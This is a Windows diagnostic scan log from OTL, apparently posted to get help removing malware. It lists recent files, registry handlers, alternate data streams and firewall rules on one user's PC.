[2014/10/15 13:08:31 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2014/10/15 13:08:30 | 002,108,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/10/15 13:08:29 | 001,068,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2014/10/15 13:08:29 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014/10/15 13:08:28 | 000,678,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2014/10/15 13:08:27 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2014/10/15 13:08:27 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
[2014/10/15 13:08:24 | 000,595,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2014/10/15 13:08:24 | 000,289,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll
[2014/10/15 13:08:23 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/10/15 13:08:22 | 005,829,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2014/10/15 13:08:22 | 001,249,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll
[2014/10/15 13:08:22 | 000,758,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll
[2014/10/15 13:08:22 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2014/10/15 13:08:21 | 000,775,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll
[2014/10/15 13:08:21 | 000,547,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll
[2014/10/15 13:08:20 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll
[2014/10/15 13:08:19 | 000,195,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll
[2014/10/15 13:08:18 | 000,940,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe
[2014/10/15 13:07:57 | 003,241,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msi.dll
[2014/10/15 13:07:50 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rastls.dll
[2014/10/15 13:07:49 | 000,372,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\rastls.dll
[2014/10/15 13:07:44 | 003,221,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstscax.dll
[2014/10/15 13:07:43 | 003,722,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstscax.dll
[2014/10/15 13:07:42 | 001,118,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstsc.exe
[2014/10/15 13:07:41 | 001,051,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstsc.exe
[2014/10/15 13:07:40 | 000,235,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winsta.dll
[2014/10/15 13:07:40 | 000,150,528 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rdpcorekmts.dll
[2014/10/15 13:07:39 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winlogon.exe
[2014/10/15 13:07:39 | 000,131,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\aaclient.dll
[2014/10/15 13:07:20 | 000,077,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\packager.dll
[2014/10/15 13:07:19 | 000,067,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\packager.dll
[2014/10/01 14:52:30 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
[2014/10/01 14:51:50 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
[2014/10/01 14:51:45 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Local\WinZip
[2014/10/01 14:51:08 | 000,000,000 | ---D | C] -- C:\ProgramData\WinZip
[2014/10/01 14:50:58 | 000,000,000 | ---D | C] -- C:\Program Files\WinZip
[2014/10/01 09:33:40 | 000,371,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\qdvd.dll
[2014/10/01 09:33:39 | 000,519,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\qdvd.dll
[2014/09/30 17:15:15 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\Desktop\Mitey Shield video
[2014/09/30 17:07:43 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
[2014/09/30 17:07:40 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\Documents\iSkysoft Video Converter Ultimate
[2014/09/30 17:07:24 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Local\iSkysoft
[2014/09/30 17:07:18 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\iSkysoft
[2014/09/30 17:07:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
[2014/09/30 17:06:27 | 000,000,000 | ---D | C] -- C:\ProgramData\iSkysoft Video Converter Ultimate
[2014/09/30 17:06:15 | 000,000,000 | ---D | C] -- C:\ProgramData\iSkysoft
[2014/09/30 17:06:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iSkysoft
[2014/09/30 17:05:20 | 000,000,000 | ---D | C] -- C:\Users\Public\Documents\iSkysoft
[2014/09/22 18:48:09 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\vlc
[2014/09/22 18:46:55 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VLC
 
========== Files - Modified Within 30 Days ==========
 
[2014/10/22 14:19:36 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/10/22 14:19:35 | 000,002,193 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/10/22 14:14:42 | 000,024,048 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/10/22 14:14:42 | 000,024,048 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/10/22 14:14:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/10/22 14:11:36 | 003,228,880 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/10/22 14:11:36 | 001,426,584 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/10/22 14:11:36 | 000,006,206 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/10/22 14:09:03 | 000,000,598 | ---- | M] () -- C:\Windows\tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job
[2014/10/22 14:07:02 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/10/22 14:06:55 | 3056,103,424 | -HS- | M] () -- C:\hiberfil.sys
[2014/10/22 13:28:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/10/22 13:22:45 | 000,004,096 | -H-- | M] () -- C:\Users\Mitey Fresh\AppData\Local\keyfile3.drm
[2014/10/18 10:29:48 | 000,356,632 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/10/16 13:45:22 | 000,002,289 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2014/10/16 13:45:22 | 000,001,447 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
[2014/10/10 13:05:59 | 000,276,480 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll
[2014/10/10 13:05:42 | 000,507,392 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/10/10 13:00:38 | 000,424,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/10/02 17:52:02 | 000,002,547 | ---- | M] () -- C:\Users\Mitey Fresh\Desktop\`Staff Computer - Shortcut.lnk
[2014/09/30 17:12:05 | 000,076,441 | ---- | M] () -- C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
[2014/09/30 17:07:06 | 000,001,354 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\iSkysoft Video Converter Ultimate.lnk
[2014/09/29 21:19:55 | 433,221,317 | ---- | M] () -- C:\Windows\MEMORY.DMP
[2014/09/26 13:08:59 | 000,000,004 | ---- | M] () -- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
[2014/09/26 09:46:19 | 000,069,632 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/09/26 09:32:04 | 002,017,280 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/09/26 09:31:02 | 002,108,416 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/09/25 13:08:38 | 000,371,712 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\qdvd.dll
[2014/09/25 12:40:50 | 000,519,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\qdvd.dll
[2014/09/24 20:48:05 | 000,701,104 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/09/24 20:48:05 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
 
========== Files Created - No Company Name ==========
 
[2014/09/30 17:07:06 | 000,001,354 | ---- | C] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\iSkysoft Video Converter Ultimate.lnk
[2014/09/30 17:06:57 | 000,721,263 | ---- | C] () -- C:\Windows\SysWow64\ISCM64.dll
[2014/09/30 17:06:57 | 000,214,528 | ---- | C] () -- C:\Windows\SysWow64\ISCM32.dll
[2014/09/29 19:47:17 | 000,076,441 | ---- | C] () -- C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
[2014/09/17 09:37:48 | 000,000,004 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
[2014/07/10 17:27:56 | 000,004,096 | -H-- | C] () -- C:\Users\Mitey Fresh\AppData\Local\keyfile3.drm
[2014/03/11 16:33:22 | 000,002,149 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Local\recently-used.xbel
[2014/02/03 08:33:54 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2013/12/19 09:49:37 | 000,000,027 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Roaming\WB.CFG
[2013/08/08 12:48:44 | 000,007,061 | ---- | C] () -- C:\Program Files\Common Files\ecisettings.props.preupdate
[2013/08/08 12:37:38 | 000,002,539 | ---- | C] () -- C:\Program Files\Common Files\ECI_Data.bat
[2013/08/08 12:37:38 | 000,000,329 | ---- | C] () -- C:\Program Files\Common Files\AppMgrIcon.gif
[2013/08/08 12:37:38 | 000,000,128 | ---- | C] () -- C:\Program Files\Common Files\StartClient.bat
[2013/05/28 17:24:28 | 000,013,824 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/05/09 12:25:17 | 000,061,304 | ---- | C] () -- C:\Users\Mitey Fresh\g2mdlhlpx.exe
[2013/04/05 11:10:11 | 000,764,746 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/03/28 13:45:05 | 000,000,376 | ---- | C] () -- C:\Windows\ODBC.INI
 
========== ZeroAccess Check ==========
 
[2009/07/14 15:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/25 13:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/25 12:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 12:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 23:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 12:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/10/10 11:45:41 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\AUSkey
[2013/07/28 21:46:44 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\AutoBinaryCode2
[2014/09/12 21:15:52 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\BatteryCare
[2014/04/08 21:58:58 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\BitComet
[2014/06/26 20:50:56 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\calibre
[2013/11/18 21:12:47 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Com.Comm100.LiveChat.AirVisitorMonitor.En
[2013/11/18 21:12:46 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Com.Comm100.LiveChat.AirVisitorMonitor.En.ED02F0ED4016DF29F52CC2E3BD1ED89CCC440D32.1
[2014/01/23 10:00:34 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\DAEMON Tools Lite
[2013/03/28 16:55:05 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Monotype Imaging
[2014/02/09 21:43:00 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\rmi
[2014/10/16 22:09:00 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Spotify
[2014/10/02 13:43:04 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
[2014/09/30 17:07:43 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 40 bytes -> C:\ProgramData\MTA San Andreas All:NT
@Alternate Data Stream - 40 bytes -> C:\ProgramData:NT
@Alternate Data Stream - 160 bytes -> C:\ProgramData\MTA San Andreas All:NT2
@Alternate Data Stream - 160 bytes -> C:\ProgramData:NT2
@Alternate Data Stream - 131 bytes -> C:\ProgramData\TEMP:373E1720
 
< End of report >

Extras.txt Log:

OTL Extras logfile created on: 22/10/2014 2:12:31 PM - Run 3
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000c09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy
 
3.79 Gb Total Physical Memory | 2.40 Gb Available Physical Memory | 63.28% Memory free
7.59 Gb Paging File | 6.05 Gb Available in Paging File | 79.78% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 273.39 Gb Total Space | 115.52 Gb Free Space | 42.25% Space Free | Partition Type: NTFS
Drive D: | 180.27 Gb Total Space | 117.47 Gb Free Space | 65.16% Space Free | Partition Type: NTFS
 
Computer Name: KIRRA-PC | User Name: Mitey Fresh | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
.url [@ = InternetShortcut] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
 
[HKEY_USERS\.DEFAULT\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
 
[HKEY_USERS\S-1-5-18\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
 
[HKEY_USERS\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1"
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0B8908D6-CCF7-40EE-99F2-9BAD28BF4B19}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{0BC55BBB-248D-4BF5-ADA6-6270B3B11686}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{0FFEC506-D187-46D2-BDF3-621541E0F983}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{1A19F61E-DB6E-404F-ACEF-4B615871A2CD}" = rport=445 | protocol=6 | dir=out | app=system | 
"{297DAB00-FEDC-47C9-B09E-97E1909889AA}" = rport=139 | protocol=6 | dir=out | app=system | 
"{3BB53184-4A31-4AFF-9977-DF3CE46A784F}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | [email protected],-28539 | 
"{741D65CC-BF52-42A5-9CE5-BEE4AEAF2D6A}" = rport=138 | protocol=17 | dir=out | app=system | 
"{7B2EAC73-751C-41B2-9666-9E94FA7E6D83}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe | 
"{81CF275F-C536-4575-BDA5-9CF942C08E5D}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{8C34F054-98EC-4FC0-BC7E-ACEF806C720E}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{90CB2CA8-BCEF-48A9-8405-9AEA3E0B54DE}" = lport=10243 | protocol=6 | dir=in | app=system | 
"{9D997B49-821A-444D-8920-A5CCCAF1D07E}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) | 
"{A480DC5D-D842-4403-8EC8-5E3D4ADCC93F}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{A4C18B0C-1FD8-4EBD-A36D-75D1C3702D8E}" = lport=138 | protocol=17 | dir=in | app=system | 
"{BED82397-C3BF-4FD5-87BC-19EBBF94AC77}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{C4FC1D7C-4D1D-4A94-8118-193B7B2FFEEC}" = rport=10243 | protocol=6 | dir=out | app=system | 
"{C9F3E318-3119-4F14-8BCA-A51E1E1478D7}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{CE2CC353-510E-49D1-AFE4-C58F31E73BAA}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{D148DB5B-5000-4D65-88EB-091B8EFC2487}" = lport=445 | protocol=6 | dir=in | app=system | 
"{D43370F8-B23B-4CFD-BC6E-D299F24AAAEB}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{E10E2CDB-4846-43DD-A763-D19C63DFB6A3}" = lport=137 | protocol=17 | dir=in | app=system | 
"{E593D741-4FAD-4710-BED6-74680DC7B837}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) | 
"{E70213CF-BEF7-4575-BBC0-5795BF980A26}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe | 
"{E7BACAB6-1DBE-4E0C-A478-A011A28342DD}" = lport=139 | protocol=6 | dir=in | app=system | 
"{F2023297-E0AC-4E52-B85D-4C2FB252C51A}" = rport=137 | protocol=17 | dir=out | app=system | 
"{F668716D-56C2-4D40-8D6D-F2462FA05D2D}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{FD1BD8F5-02BF-46FA-9678-555491850959}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0A19E1BC-DF06-495B-B95F-7EDD7B024D05}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{0A410111-BF3A-4C15-B7D0-49DBAFF003AE}" = protocol=1 | dir=out | [email protected],-28544 | 
"{0C24E7A1-7B4E-43D6-9911-C15CCF348321}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{0D9D9357-421E-48EB-BB82-6294722E93A7}" = protocol=58 | dir=out | [email protected],-503 | 
"{1678EE80-1670-4CDC-B7BC-B05348016B92}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
